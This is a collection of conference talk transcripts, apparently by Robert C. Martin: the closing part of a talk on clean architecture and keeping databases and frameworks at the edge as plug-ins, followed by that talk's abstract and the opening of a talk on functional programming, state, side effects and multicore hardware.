spinning disk in this room? Oh my God, really? You know, nowadays we don't even think about spinning disks anymore. We think about solid state memory. Oh, we think back in the server room there's probably spinning disks. But they're going away too. You watch over the next few years the spinning disks begin to disappear. Everything gets replaced with RAM. And I said RAM, didn't I? RAM is directly addressable at a byte level. What we are approaching is a virtually infinite amount of directly addressable RAM that is persistent. That's where we're going to be storing our data. And if that's where we're going to be storing our data, why in hell would we want to use SQL to access it? SQL is a pain. Tables are a pain. Wouldn't you rather be following pointers around? Wouldn't you rather be looking things up in hash tables? Isn't that what you do anyway? You read all the tables into memory and then put the data in a better organization so you can actually use it? What if we just left it in that format that we want to use it in? If I were Oracle, I would be scared to death. Because the reason for my existence is disappearing out from under me. The notion of a big database system is beginning to go away. How can I protect my application from this detail? This detail of a database that tends to dominate everything. And I can protect it the same way I protected my application against the web. I draw another one of those nice big, heavy black lines. I make sure all the dependencies cross that line going inwards towards the application. I make the database a plug-in to the application so that I can swap out Oracle with MySQL, or I can yank out MySQL and put in CouchDB, or I can take out CouchDB and put in Datomic, or whatever I wish. I can plug in the database. You may never change the database, but it's nice to be able to, even if you don't have to. How do we do it? Well, it's fairly straightforward. There's another interface up there. I called it here the entity gateway. You probably have one per entity, and the methods in the entity gateway are all the query methods. Anything you might query, there's a function for, a method for. You implement that method down in the entity gateway implementation below the line. That implementation uses the database, whatever it is. Notice that no part of the database manages to leak into the application. Where do the entity objects come from? The entity objects are probably fetched out of the database, although God knows what crazy way they've been spread out into tables. The implementation of the entity gateway will gather the data together, create entity objects, and then pass them across the line. If you get them up above the line, they are real entity objects. Guys using something like Hibernate and Hibernate, some ORM tool. Who's using something like that? Where would that be in this diagram? In the implementation below the line, no part of that ORM tool would be known above the line. Are you using those funny little annotations or attributes in your business objects? Get them out of your business objects. You don't want your business objects to know that they are built by Hibernate. Let them be built below the line by somebody who's polluted already by the database concept. Keep your business objects pure. Why? What's an object? I've got time for this. What's an object? An object is a set of public methods. And, well, you're not allowed to know the rest, are you? There might be data in there, but you're not allowed to see it. It's all private, isn't it? From your point of view, an object is a bunch of methods, not a bunch of data. An object is a bunch of methods. An object is about behavior. An object is about business rules. It is not about data. We presume there's data in there somewhere, but we don't know where, and we don't know what form it's in, and we don't want to know. What is a data structure? A data structure is a grouping of well-known data elements, public, visible to everybody, and there's no methods in them. Data structures don't have functions. These two things are the exact opposite of each other. A data structure has visible data and no methods, and object has visible functions and no visible data. Precisely the opposite. There is no such thing as an ORM. Object Relational Mapper can't do it, because what comes out of a database is a data structure, and you cannot map a data structure to an object, because they're completely different things. What's happening here is that the data needed by the entities gets put somewhere, God knows where, and somehow magically passed to an entity that uses it somehow, and I don't care how. Those entities are not constructed by a hibernate. Probably those entities use a bunch of little data structures that hibernate did construct, but I don't care how. I don't want any knowledge of hibernate or any other framework to cross that black line. Stuff below the black line can be polluted. Above the black line, no, those are my family jewels. I'm going to keep them protected. Those are my business rules. I'm not going to allow my business rules to be polluted with frameworks. Frameworks. We like our frameworks. We think they're cool. We think frameworks save us a lot of time, and they do. But the authors of frameworks entice us to bind to them. We offer us base classes for us to inherit from. When you inherit from a base class, you marry that class. You bind yourself strongly to that base class. There is no relationship stronger than inheritance. So by deriving from someone else's base class, you are making a huge commitment to them. On the other hand, I'm not making any kind of commitment to you. So it's an asymmetric relationship. The framework author gets the benefit of your commitment, but the framework author makes no commitment to you at all. I leave you to make that comparison to yourself. A wise architect does not make that binding. A wise architect looks at the framework cynically, looks at it and says, that framework is out to screw me. That framework wants me to bind to it, and I don't think I'm going to. I think I'm going to put boundaries between my business rules and that framework so that my business rules are not forever tied to hibernate, or spring, or God knows what. I will use the framework, but I will use the framework carefully, because the author of the framework does not have my best interests at heart. Long ago, my son and I and several other people wrote a tool called fitness. Does anybody use fitness? A bunch of you, good. Fitness is a tool for writing customer acceptance tests based on a wiki. That's all you need to know. Who invented the wiki? Ward Cunningham. Who's Ward Cunningham? A guy who invented the wiki. He's a lot more than that. Ward Cunningham is one of those gurus of gurus. All the gurus know who Ward Cunningham is. All the guys who go around speaking at conferences like me, we all know who Ward Cunningham is, and we revere him from on high. He's the guy who made the phone call to Eric Gamma, said, you know Eric, you ought to write a book called Design Patterns. This is the guy who mentored Kent Beck, taught him things like pair programming and test driven development, and agile development. Ward Cunningham is one of those guys that, if you know a lot about the history of software, you think, whoa, he's had his hands into everything. Fitness is based on two inventions of Ward, the wiki and fit. I'm not going to describe fit. I will describe the wiki, however. My son and I and a bunch of other folks decided to write this in Java about 12 years ago, 13 years ago, something like that. We knew we wanted to make a wiki, and so we thought, well, we got to have a place to store the pages. Let's store them in a database, and what database would that be? Well, back in those days, the only open source database was MySQL, so we decided to put everything in MySQL. We were about to go fire up MySQL and start building a schema, and somebody said, well, you know, we don't really have to do that right yet. We will later, but not right now, because we can get away right now with another problem. That problem is translating wiki text to HTML. That's what a wiki does, takes the funny text that you type into the wiki and turns it into HTML. There was a lot of that translation that we needed to do, so for about three months, we just forgot about the database altogether, and we translated wiki text into HTML. We needed an object for this, which we called a wiki page. You can see it here. We created an abstract class named wiki page, and we implemented it with something called Mock wiki page. The methods of wiki page had database-like functions, such as load and save, but they were unimplemented. They didn't do anything. For about three months, we worked that way. Once we had all the translation done, then we said, well, it's time to fire up the database, because now we need to actually store these pages somewhere, and somebody said, well, we don't need to do that yet, because what we could do instead is take these pages and store them in a hash table in RAM. We don't really need to store them on diskette, do we? It was no, because all we were doing was writing unit tests anyway. So we decided to create another version of the wiki page called the in-memory page, which stored all the data in hash tables. We continued to work for a year, continuing to write more and more of fitness, keeping all the data in memory. We actually got all of fitness working without ever putting it into a disk. It was very cool, because all the tests went really fast, and we had to do the database. On the other hand, it was frustrating, because we would create a bunch of tests, and then shut the computer down, and they'd all be gone. So at some point, we finally said, well, now it's time for the database, let's fire up MySQL. Michael Feathers was there at the time, and Michael said, well, you don't really have to fire up MySQL yet. All you really need is persistence, and you can get that persistence really cheaply by taking the hash tables and writing them out to flat files. We thought, well, that's kind of ugly, but it'll work for the time being, and then later on, we'll switch it all over to MySQL. So we did that. For another three months, we continued to develop more and more about fitness, and that was kind of cool, because we could take it on the road, we could show it to people, we could save pages. It started to work like a real wiki. About three months after that, we said, well, we don't need that database. It's working fine. Flat files are fast enough, it works okay that way. We took that highly significant architectural decision and pushed it off to the end of the planet. We never put that database in, and that's not quite true, actually, somebody else did. A customer of ours came along a little later and said, I've got to have the data in a database. We said, well, why? It's working fine in a flat file. He said, corporate policy, all corporate assets must be in a database. I don't know who they've been talking to, but these database salesmen are pretty convincing. So we said, well, look, if you really needed in a database, here's this structure. All you have to do is create a new derivative called MySQL page, and everything ought to work fine, and he came back a day later with the whole thing running in MySQL. We used to ship that as a plug-in, but nobody ever used it, so we stopped. Here's an architectural decision that we deferred and deferred and delayed and delayed. We delayed it right off the end of the project. We never did it. Something that we thought we had to do at first. We never did. And that leads to the final principle. A good architecture is an architecture that allows major decisions to be delayed, deferred. The goal of an architect is to not make decisions, to delay those decisions as long as possible so that you have the most information with which to make them. You structure the design and the high-level structure of your code so that all these high-level decisions can be pushed off. Don't tell me that the architecture of your application is a bunch of frameworks. What's the architecture of your application? We're using a SQL server, an MVVM, and a lot of the... But you're not telling me anything. You're telling me the tools. That's not the architecture of your application. The architecture of your application are the use cases. You want your use cases to not know about those tools. You want to be able to defer the use of those tools for as long as possible. You should be able to have the whole application running without ever firing up a database, without ever firing up the web. Or maybe you fire up some gunky little web thing that you can toss together in a day or two just so that you can see some pages without firing up some gigantic framework. Maybe you fire up some dumb little database thing just so that you can see some persistence running without ever having to buy licenses to Oracle and all the nonsense you have to go through to get that running. Next time you have an application to write, think about what you can delay. The application of a system should be a plug-in architecture. The architecture of a system should be a plug-in architecture. Where all of the details, like the UI, the database, and the frameworks, plug in to the use cases, which are the real core of your application. Now, of course, customers are going to want to see web pages. You can still make a plug-in architecture and show them web pages running. You don't have to make a lot of commitments to the frameworks. You can probably put something simple up at first. Or if you want to actually use a real framework, fine, go ahead, but maintain the plug-in structure so that at a moment's notice you can unplug it and plug something else in. And that probably brings me to the end of my talk. I already talked about that earlier. So, thank you all very much for your time. Are there any questions? It's very difficult to see, so I'm going to come down here. Oh, that doesn't help at all. Anybody have any questions? You're going to have to, like, holler, because I won't be able to see your hands up. So, I am speculating the demise of Oracle and relational databases. What do I suggest will replace them? What an interesting question. It could be nothing more than RAM. Why do you need anything to replace them? If you can organize the data in RAM, and if that RAM is persistent, you can replace it with a new one. If you can organize the data in RAM, and if that RAM is persistent, what else do you need? Oh, but let's say you need something. Okay, what might it look like? Well, who's heard of CQRS? Oh, yeah, a few of you. CQRS, what an interesting idea. If we have an infinite amount of high-speed memory, high-speed RAM, or maybe it's even disk, but who cares? Why would we store the state of anything? Why wouldn't we simply store all the transactions? Instead of storing a bank account, why wouldn't we store the transactions that caused us to create the bank account? The transactions that forced us to change the name in the bank account, or the address in the bank account, or the balance in the bank account? Why wouldn't we store those transactions and reconstruct the state? And you say to yourself, well, that would take a lot of time. Yeah, but we've got lots of processing power. We can do that now. We have almost an infinite amount of processing power and almost an infinite amount of RAM. Why wouldn't we store just the events? I think that's an interesting idea. If we stored just the events, then we would never delete anything. We would never update anything. You know, crud, create, read, update, delete. We'd lose the last two letters there. All our applications would be crrr. Create and read. We would never update. We would never delete. And when you don't update and you don't delete, you don't need transactions. There can't be any concurrent update problems if you're not updating. That's interesting. Are there frameworks out there that allow you to do things like that? There are. There are a number of them out there that are right only databases. Right once, read many times. You can find them on the web. I'm not going to tell you their names right now, but you can go out there and look for them. They're out there. You might replace them with something like that. You might replace them with Couch or Mongo, or you might create some other thing. It really doesn't matter much. You don't have to have some massive vendor offering from some gigantic company in the sky that blesses you and says, yes, son, you may use my database system. Maybe you can just make your own. Not that hard. Anybody else? Yeah, that actually helps a lot. Okay. Anybody else with a question? It doesn't look like it. It doesn't work very well. Like, where do you send the H? Deferring decisions does not work very well when... When you have a family. When you have a family. You mean in general. There are decisions you can't defer. For example, what language are we going to write this thing in? You're going to have to make that decision pretty early. You've got to write something. The fact that you're going to have a database, probably something you're going to have to make a decision on pretty early. The fact that it's going to be a web application, you'll probably have to make that fairly early. You're going to have to make that decision pretty early. The fact that it's going to be a web application, you'll probably have to make that fairly early. You'll have to commit to the framework. No. So, if you're going on a family vacation, that's what you were saying here. We could plan out where we were going. Would we have to also plan out which car we would use? If we're planning six months in advance, we might decide to buy a whole new car just for the heck of it. We might have, maybe our car will break down in the middle, or before we go on the vacation. The car itself is just a vehicle. It doesn't matter as long as our luggage fits in it and our family. We can still go on the vacation. The database system is like the car. We don't need to make that decision as part of the vacation plan. That one can be deferred till the last minute. You could buy a new car the last minute, the day before you decided to go on vacation. And why would you do that? You might have gotten a raise. You might have more money. You might have had a baby and you need more space. A lot of reasons why you might want to buy that car at the last minute. Anybody else? Yep, way back there. How do you deal with legacy architecture? Okay, that's going to take me more than a minute. So I'm going to use one word to answer that question and I'll explain that word. Incrementalism. Everybody faced with legacy code wants to throw it away and write it over. Please don't do this. It generally fails horribly. You will spend a tremendous amount of money and waste a load of time. Take little bits of it and rewrite those tiny little bits one at a time and get them working one little bit at a time. That will leave you with a patchwork, but the patchwork will be cleaner than the original. And then start over and start re-implementing the patchwork. Gradually cleaning it, making it better and better. Take you a long time. A lot of effort. You want to do that while you're also adding new features. In fact, that's just generally cleaning your code. Please don't try the big redesign. You will get hurt. Thank you all for your attention. I'll see you in another time.
|
So we've heard the message about Clean Code. And we've been practicing TDD for some time now. But what about architecture and design? Don't we have to worry about that? Or is it enough that we keep our functions small, and write lots of tests? In this talk, Uncle Bob talks about the next level up. What is the goal of architecture and design? What makes a design clean? How can we evolve our systems towards clean architectures and designs in an incremental Agile way.
|
10.5446/50861 (DOI)
|
And I should be live. Am I live? That's good news to me. Why is there air? Why do we have air? Where did it come from? What's it made of? Who knows what it's made of? Nitrogen and oxygen, almost entirely nitrogen and oxygen. It's about three quarters nitrogen, one quarter oxygen. The actual oxygen percentage is about 21%. There's a little bit of carbon dioxide, about 300 parts per million and growing. There's tiny bits of other gases, but for the most part it's nitrogen and oxygen. Where did the nitrogen come from? How do we have nitrogen, free nitrogen in our atmosphere? Where did that come from? It probably came from ammonia, which is fairly common in the universe at large, especially in molecular clouds. And that probably got ripped apart by sunlight. Where did the oxygen come from? Plants, green plants. Green plants do this. They emit oxygen. And it's a good thing they do because we use that oxygen. The plants use sunlight to gather energy. And the way they store that energy is they tear the oxygen off of carbon. And they put all that energy into the carbon atom. They mix it with a few hydrogens to turn it into sugar. And then they take the sugars and they stack them end to end to turn it into wood. And that's why wood burns, by the way. Wood burns with solar energy. The oxygen ratio in our atmosphere is about 21%, but it was not always so. Before there were plants, there was no free oxygen. And in fact, free oxygen is something you don't expect to find in a planetary atmosphere because oxygen doesn't want to be free. Oxygen combines with things. For example, it combines with iron. If there were any iron anywhere on the surface of the planet or dissolved into the oceans, the oxygen would disappear overnight. It would rust that oxygen, that it would rust that iron away. And in fact, that's what happened for the first three billion years of the history of life on Earth. Every oxygen atom emitted by a plant got grabbed by an iron atom and fell to the bottom of the sea. Because in those days, there was a lot of iron dissolved into the sea. And so this rust, iron oxide, fell like rain down to the bottom of the sea floor, nowadays we call this iron ore. It took three billion years to get rid of all the iron in the oceans. So it was only about a billion years ago that oxygen began to accumulate in our atmosphere. And it accumulated and it accumulated and it accumulated at one point about 250 million years ago. The atmosphere was almost 50% free oxygen. In that kind of an atmosphere, you could sneeze and start a forest fire. The animals grew to enormous size and I'm not talking about the dinosaurs here, I'm talking about dragonflies. There were dragonflies that had six foot wingspans because there was so much oxygen in the air they had plenty of free energy. Eventually that oxygen level tapered down a little bit. Nowadays we have a more rational amount of oxygen in the atmosphere. Although frankly living in a sea of oxygen is fraught with danger, which is why we all have smoke alarms in our houses. But of course this is not what we're supposed to be talking about. The name of the talk I'm going to do today is called functional programming. What, where, when, why, how, or the failure of state. How many of you are functional programmers? Meaning that you program in some nominally functional language like F-SARP? Who's doing F-SARP? Is this a functional language? Who's doing Scala? A few of you. Who's doing some kind of Lispy language? Who's some Lispy languages over here? Who's doing a real functional language like Haskell? Nobody. Okay, how about ML? Yeah, nobody. Okay, so fine. I didn't name them all. That's all right. We're going to be talking about functional programming, not a functional programming language. At the end of this talk I'll show you a little bit of closure, which is a Lispy kind of language. This guy's name is Rich Hickey. Who's heard of Rich Hickey? All right, this is the author of the closure language. He is a brilliant speaker. Find some of his talks on YouTube and you will be amazed at what a good speaker he is and the interesting insights he can give you. One of his talks is about state identity and value. Briefly, one is a value. I don't think that's lost on anybody. The next line says that X is an identity, an identifier. And in this case, that identifier identifies the value one. The next line, however, is problematic because it suddenly says that the identifier will identify a value, but you've got no idea what that value is. And the identifier has a state, not a value. And that state can change. The subject of this talk is that state has failed, but how can this fail? A statement like this is so common in our programs, how can we call this a failure? Is that program stateless? Well, from the point of view of the program, it's stateless. It does have an effect. It seems to print something on the screen, but we can ignore that. From the point of view of the internals of this program, there's no state being changed anywhere. So here's an example of a program which does something nominally useful and does not change any state. Here's another program. And probably all of you have written this program at one time in your life. It is the squares of integers program. It prints out the squares of the first 20 integers and what we notice here is a variable that changes state. Now, this looks perfectly normal. What's a for loop for? If you can't change state, right? A for loop changes the state of variables. This works just fine, but it is stateful. It is not stateless. And we're going to talk about why that can be dangerous. Now, can this program be written so that it is stateless? And it can. You could write it that way. It's not particularly useful, but no variable is changing state in here. There's a better way, of course. You could write it that way. This is a recursive algorithm. Print squares calls itself. If it's greater than zero, it continues to call itself. If n is greater than zero, it continues to call itself. And for every iteration, it prints out the square of that particular value of n. No variable changes state here. New variables are introduced. The variable n gets recreated and recreated and recreated, but at no point does any variable change its state. This is a functional program, sort of written in a nonfunctional language, but it is stateless. By the way, how many of you are Java programmers? Some of you, see, I got these big lights in my eyes so I can't see you. Get your hands way up in the air. Java programmers, yeah, there's some of you in here. How many of you are.NET programmers? Hmm. Seems to be a slight bias in this audience. And Java programmers, does your execution platform support recursion well?.NET programmers, does your platform support recursion well? Does it, for example, allow for tail call optimizations? It's an interesting question. The Java runtime does not. The.NET runtime does in some circumstances a program like this, if you were to change this number to say 2 million to print out the first 2 million squares might cause the stack to blow. In fact, this particular function would cause the stack to blow because it's not tail call optimized. So the stack will blow here whereas the original one, the one that was stateful, wouldn't blow the stack on anything. So there's a certain memory usage here. Memory is getting used in an inefficient way if you cannot tail call optimize. By the way, what the heck is it with these platforms?.NET and Java. Why would tail call optimization even be an issue? The year is 2014. This is an optimization that was ended in the 1950s. What's up with our platform people? I think they were kids out of school. Who read this book? Some of you have read this book. All right. Wonderful book. It's free, by the way. You can download it off the web. They give it away now, which I think is remarkable. Along with it, they give away all the video lectures of these two guys. You can watch them teach the computer science course at MIT in the 1980s as they deliver the content of this book. The book is fascinating. I picked it up and read it maybe 10 years ago. I noticed something about this book right away. It makes no apologies. It moves at light speed. You open up the book, you start turning the pages. They hit concept after concept after concept. They don't dittle around. They don't over explain. It just goes boom, boom, boom, boom, very fast. As I was reading it, I was just throwing the pages. It was an exciting book to read if you can think of a computer science book as being exciting. I was excited by this book. I was throwing the pages, reading it. Oh, this is cool. The language inside was Scheme. They don't really explain Scheme, but it doesn't matter because Scheme has almost no syntax, so you can easily infer what these programs do. Page after page after page after page. They're talking about basic algorithms, queuing structures, stacking structures, symbol tables, message passing, all kinds of stuff, tons and tons of code. You get to page 249, I believe it is, and they stop. They apologize for what's about to come. They say, we're sorry now. We're going to have to corrupt our currently very clean view of what a computer is. They go on paragraph after paragraph apologizing for what's about to come, and they introduce an assignment statement. I was thunderstruck. I stopped reading and I stared at this thing, and it made the claim that no assignment statement had been used in any of the previous code in the 249 pages I had read. I had to go back and read that code to look for an assignment statement, and nowhere in there was there an assignment statement. That really fascinated me. I thought, wow, they did that whole first 250 pages with no assignment. Typically in a computer book, the first thing you learn is an assignment statement. They delayed it for 259 pages, and they apologized it for it. I'll tell you why they apologized for it in a minute. Here's how their model of computing worked before they introduced an assignment statement. I will use the squares of integers. You see this function call here. A function call in a functional language can be replaced by its implementation. If I were to take this here and simply stick it there and put the values in, it would still be the same program. Let me show that to you. There we go. I have now taken that first call to print squares, and I've just put the values in. But of course, I have to do it again. But I've got to do it again. And I'm simply substituting the function calls for their implementations. If you think about this carefully, you'll realize that that turns in to the very silly implementation that I had put up there before with nothing but the 20 lines that printed the squares of integers. It turns in to almost the same thing except for these cascading ifs. This was the model of computing that that book that I recommended was using for all 249 of its first pages. You could simply replace a function call with its implementation. But when you introduce an assignment statement, that breaks. And this was the apology that they made in the book. Once you introduce assignment, you can no longer replace a function call with its implementation. And why? Because the state of the system may have changed. An assignment statement introduces the concept of time, which is why I show time here in such a warped way. Time becomes important whenever you have an assignment statement. An assignment statement separates the code above the assignment from the code below the assignment in time because the state of the system has changed. In a functional program, that statement will always be true no matter what time it is. The value of f of x will remain the value of f of x no matter what the heck the time is. No external force can change the value of f of x. To put that into a J unit or an N unit, for those of you who are crippled in that way, by the way, who's using N unit? Who's using that other thing? MS test. Stop doing that. Slow, it's complicated. Use N unit. Or there's another one now, x unit, I think, written by the same guy who wrote N unit. Anyway, look at that statement there. Should that statement pass? Should that test pass? If f is functional, that statement will always pass. But if f contains an assignment statement that somehow changes the state of the system, that function could fail. That statement could fail. Imagine staring at that in a test and noting the test failing. What conclusion would you have to come to? You'd have to come to the conclusion that f has a side effect. What's a side effect? A side effect is an assignment statement. All side effects are the result of assignment statements. If there are no assignment statements, there cannot be side effects. Only assignment statements change the state of variables. If there's no assignment, no variable can change its state, and so there cannot be side effects. When you have a function that gives you a side effect, you need another function to undo the side effect. Consider the function open. It opens a file. You need another function, close. To close the file, to undo the side effect. Consider the function malloc, the old C function malloc. That creates a side effect. It allocates memory. You need another function free to undo that side effect. If you seize a semaphore, there's another function to release it, to free it. If you grab a graphical context, there is another function to release it. Functions with side effects are like the sith, always two there are. And they are separated in time. The one must always come before the other, before in time. Malloc must always precede free. Open must always precede close. Close we hope follows open. What happens when you don't do this correctly? Leaks. One of the gross symptoms. Leaks. Has anybody ever had a memory leak? You were using assignment statements. You were using functions that had side effects and so you had a memory leak. What have we done in our languages? To protect us from memory leaks. Garbage collection. The greatest hack ever imposed upon any programmer. Garbage collection. The final admission that we are terrible at dealing with side effects. We've put it into our languages now that we're so bad at dealing with side effects, our languages have to clean up after us because we are incapable of cleaning up after ourselves. That's what side effects do. Unfortunately, we don't have garbage collection for semaphores. We don't have garbage collection for files left open. Maybe some of us do. Many of us don't. We don't have garbage collection for all of the funny functions out there that have side effects. So we still have the problem. We've only introduced this horrible hack of garbage collection in the one case where we can get some control over it. So let me show you an implementation of the bowling game. How many of you bowl? Ten-pin bowling. You don't need to know how to score bowling. It doesn't matter. I'm just going to show you these two implementations. And we'll look at them. One of them is sort of functional and one of them is definitely not functional. And we'll look at the functional one first. This is functional sort of. It's functional if you blur your eyes enough. We begin with a function called a role. This role function allows us to capture the number of pins knocked down by a ball. You would call this function every time you rolled a ball at the pins and you would record into a list the pins that you knocked down. Now you think, well, this is some kind of state change. Not exactly. Each element of this list is being initialized. No value of the list is being changed. There's a variable here called current role. That's definitely getting altered. However, that alteration only exists within the role context. So once I have called a role for the entire game, I don't need to worry about that variable anymore. So this is not perfectly functional, but I can blur my eyes. I can step back from it from a few thousand feet and say, well, it's functional in the sense that once you're done calling role, you don't care about this variable anymore. The list has been built. And then I can process the list. And I can process the list by walking through the list looking at the balls, looking at the roles, and deciding whether or not the roles are a strike or a spare or a non-striker spare, and manipulating some kind of pointer. Once again, this is not perfectly functional because I've got this variable here that gets manipulated. However, once a score returns, all these variables are destroyed. So from the point of view of the call to score and its return, there's no side effect. Internally, there are side effects, but that's a very limited scope. So at a very limited scope, this is not functional. At a wider scope, it is. Or I could do it this way. I've got this enum here. This is the stateful representation. I've got some enum here. It's going to record the state of the system as I roll balls. And here's the role function. The role function attempts to calculate the score in real time. And in order to do that, it's got to store a state variable. And that state variable alters the way this program works from roll to roll to roll to roll. So a call to roll will do something different depending on the state it was left in by the last call to roll. This one is not functional. This one is highly stateful. If I were to put the call to roll here in the first example, it would pass. If I were to put the call to roll there in the second example, I doubt it would. If I were to put the call to score here, it would probably pass. But in the second one, well, it would pass too because it didn't do anything. Which of these two is simpler? That's the stateful version with the finite state machine in it. This is the functional, quasi-functional version. Which of those two is simpler? It turns out the functional version is much simpler. Which one is faster? Probably the stateful one is faster. Probably. Because it's doing less work. It's saving state, but it doesn't have to squirrel away all those variables. I'm not sure I haven't measured them. Probably not a huge difference. Which one is more thread safe? The functional one is much more thread safe. There's hardly any variables to get confused in there, but the non-functional one has that state variable. And if you had multiple threads calling roll, it would get pretty interesting. Which one uses more memory? The functional one does. It's got to save all those rolls up in a list before it can process them all. And that's one of the issues. What do we know about memory? It's cheap. How cheap is memory? I got a thumb drive here. What is it? I don't know. Probably 5 gigabyte. No, it wouldn't be 5, would it? 8 gigabytes? Maybe 8, maybe 16. I really don't know. I don't use it. I just keep it in my pocket because it's fun to have 8 gigabytes in your pocket. 8 gigabytes in my pocket. How many bits is that? 64 billion bits in my pocket. How did that happen? Because memory didn't always used to be cheap. We've got lots of it. We have virtually infinite amounts of memory nowadays. This machine here has a half a terabyte of solid state memory. When's the last time you saw a rotating disk? Does anybody in the room still have a rotating disk in their laptop? Of course, all of you have laptops. Yeah, oh, there's some rotating disks over here. I'm so sorry. If I'd asked that question a year ago, about 10% of you would have put your hands up. If I'd asked that question two years ago, half of you would have put your hands up. If I'd asked that question five years ago, everybody would have had their hand up except for one person and we would have all hated him. Memory has gotten cheap, absurdly cheap. We are filthy rich with this stuff. We are wealthy beyond belief because memory is pouring out of every orifice of our bodies. It's unbelievable how much memory we have and it's dirt cheap, hundreds of dollars for a terabyte. That's absurd. It didn't used to be that way. Who knows what that is? That's memory, core memory, core memory of the 1960s. Every one of those little donuts you see there is made out of iron. Every one of them had to be put into that network of wires by hand. There was no machine that could make core memory. It was woven on a loom by human beings, bit by bit by bit. It was frightfully expensive. I used to purchase this when I was a teenager. I would get army surplus core memory for hundreds of dollars for a thousand bits. I once purchased a solid state memory rack of 512 bits. It cost me $512. 64 billion dollars worth of memory when I was a teenager. We used to do bizarre things like try and figure out how to store bits on rotating memory surfaces. This is an old disc. Look at that thing. It was 14 inches across. It had, I don't know, a dozen platters. You wrote bits on the top and on the bottom of each platter. The heads would slide in there and they'd right on the top and they'd right on the bottom. The heads had to move in and out to find the different tracks on the disc. These things would spin at about 3600 RPM. That's a drum. Look at how inefficient that is. We would write on the surface of that drum. This is an old deck tape. We used to write on the surface of mylar tape impregnated with iron, magnetic tape. That's an old CRT memory which used the persistence of the phosphors to remember bits. If a phosphor point was glowing and you hit it with the electron beam, it would impede the beam and you could detect that with the amount of current you put into the beam. You could tell if a point was still glowing, absurd kinds of memory things. Nowadays, of course, it's dirt cheap. Functional programming was invented in 1957. Before 00, nobody even thought of 00. Before structured programming, Dykstra had not yet written his paper about go to being considered harmful. Yet in 1957, we were already doing functional programming. Functional programming was the first of the three major paradigms to be invented. The last to be adopted, oddly. Why? Because memory was too expensive to make it practical. I mean, do you remember when we worried about that? In a date? But that's changed. We don't worry about memory anymore. Memory is too cheap to worry about. We throw it away in megabyte lots. We think of a megabyte as infinitesimally small. So why should we change how we program? Should we change how we program? Given that memory is dirt cheap. Well, probably we should. Functional programs are simpler. You can prove this to yourself by writing a few. By the way, it takes much longer to write a line of functional code than it takes to write a line of nonfunctional code. But you wind up with far fewer lines of functional code. Oddly enough. And the amount of time spent programming turns into a smaller amount of time because you don't have to worry about the state of a variable. So it makes them easier to write, although it doesn't feel that way. Because every line you have to think about much harder. And yet in the end, the functional program is easier to write. It's easier to maintain. Everybody says this about everything, right? It's always easier to maintain. But it actually is. And why? Because of that. There are no temporal couplings, no side effects, no worries about what function to call before any other function or what function must be called after some other function. How many of you have debugged for weeks only to find that the problem was two functions that were called out of order? And you swapped the two and the system started to work and you don't know why. These two functions had to be called in this order. They just do for some reason. This is not an uncommon debugging scenario. In a functional program, that disappears. I said here that there are fewer concurrency issues. In a purely functional program, there are no concurrency issues because there's no variables. What is it that makes a program unthread safe? Side effects. Two functions trying to create a side effect. The two of them collide because of thread swapping and they improperly modify the side effect. If there are no side effects, if there are no assignment statements, you can't have thread problems. Why did I say fewer? Because in most functional programs, there is a portion of the program, a well-isolated portion of the program, which actually does do some assignment. And in that portion, you can get some concurrency issues, but in the vast majority of the code, you don't. So we can get a lot less concurrency problems if we're using functional programs. Has anybody debugged a race condition for a month and then given up and said, well, just reboot the thing every once in a while? You never have to ask. Think about this, right? You're in the middle of a debugging session. You're sitting there. You've break pointed your way deep down into the code and then you ask yourself, what the hell is the state of the system? You never ask that. In a functional program, the system has no state. What you're looking at here is Moore's law. From 1970 to 2010, the number of transistors in a chip has been going up at, notice this is a log scale. So at some doubling rate, which people usually say is about 18 months. So every 18 months, the number of transistors on a chip doubles. Here's the clock speed. That's this dark blue line. And look at what happened here. Right about 2003. It went flat. Do you remember 2003? We got up to three gigahertz clock rates. And the yields were bad. The power was bad. We dropped on about two and a half gigahertz and it stayed there for 10 years. For the last 10 years, we've been sitting at two and a half gigahertz and it doesn't look like it's going to change. There's a possibility of some new materials that might make an incremental change in the clock rate. But not the geometric growth. This growth here is gone. We're not going to see that continue up here. It's folded over. But the number of transistors on the chip has not. The density has continued to grow. Now that's going to fall over too. Probably pretty soon. Because we're down to about 20 atoms in a wire. So there's only so much further you can go. But for the moment anyway, we continue to double this density number. And that has given the hardware engineers the ability to do more cores. How many of you have four cores in your laptops? How many of you have more than four? Don't fall for the hyperthreading thing. They'll tell you there's eight cores on there. There's not eight cores on there. Four. And they do this lie they call hyperthreading. Who's got true eight core? Yeah, okay. Good. I recently bought a 12 core machine for my daughter. Actually that was three chips with four cores each. But they still share nicely. Notice what's happening here, right? We're multiplying cores. Why would we multiply cores? Because we want to keep increasing throughput at some rate like this. Cost per cycle. Dollars per cycle. We want to increase this by this rate. But we can't do it with clock rate anymore. So we do it with cores. And the hardware engineers have started making some very bizarre tradeoffs. Do you know all that cashing stuff they used to put in the chips? The L1 cache and the L2 cache and the L3 cache and all that pipelining goop they used to do to squirrel away the instructions that were about to be executed and they'd flush that if you did a jump. You know all that stuff. They're ripping all that stuff out. They're going to make the processors slower. They're just going to put more processors in. So as we add more and more cores, the individual cores will slow down. But the throughput of the chip goes up. If you can take advantage of those cores. How do you take advantage of those cores? How do you do that? How good it we are at writing threaded code? Now, multi-threaded code is code which operates one instruction at a time. The processor is still a linear processor. The operating system tells one process it can go and the operating system is like a mother. It watches over the process as it runs. It makes sure the registers are loaded before it runs. When it tells it to stop, it grabs all the registers and squirrels them away and puts the process away in a nice place and then gets the next process out and unpacks the registers and lets it run for a while and it takes nice care of the process. There is no mother when you've got multiple cores running because now you have simultaneous execution, not concurrent execution. You've got four cores, you've got four instructions running simultaneously and they're all hitting the bus and they're all angry animals scrapping for that bus. They want that bus, they want their bites, they say, give me a bite, here, take this bite, give me a bite and there's no operating system to hold them off and make them behave nicely. So we programmers who have grown up with the nice operating system that lets us use our threads nicely and we still can't do that well are now faced with the jungle of the bus. And how many cores will we have to deal with? We have four now in most of our chips, some of the chips will have more. If I come back here in two years, your laptops will have eight. If I come back in four years, your laptops will have 16. If I come back in ten years, your laptops may have 512 cores. How are you going to write programs? How are you going to write systems that behave well with 1024 cores? How are you going to get the maximum out of your machine when you've got 16384 cores? How are you going to do that? And you may think, well, the operating system will handle that for me. I don't think so. I don't think so. I think the operating system folks are going to go, hey, programmers, this is your problem. So we programmers who have for the last 60 years lived in this fantasy world of one instruction at a time are now facing the real world. And the real world is the world of competing cores on a single memory bus. And we're going to have to deal with that somehow. And maybe one of the ways to deal with that is to give up the assignment statement, walk away from the assignment statement and never use it again except in very disciplined environments. 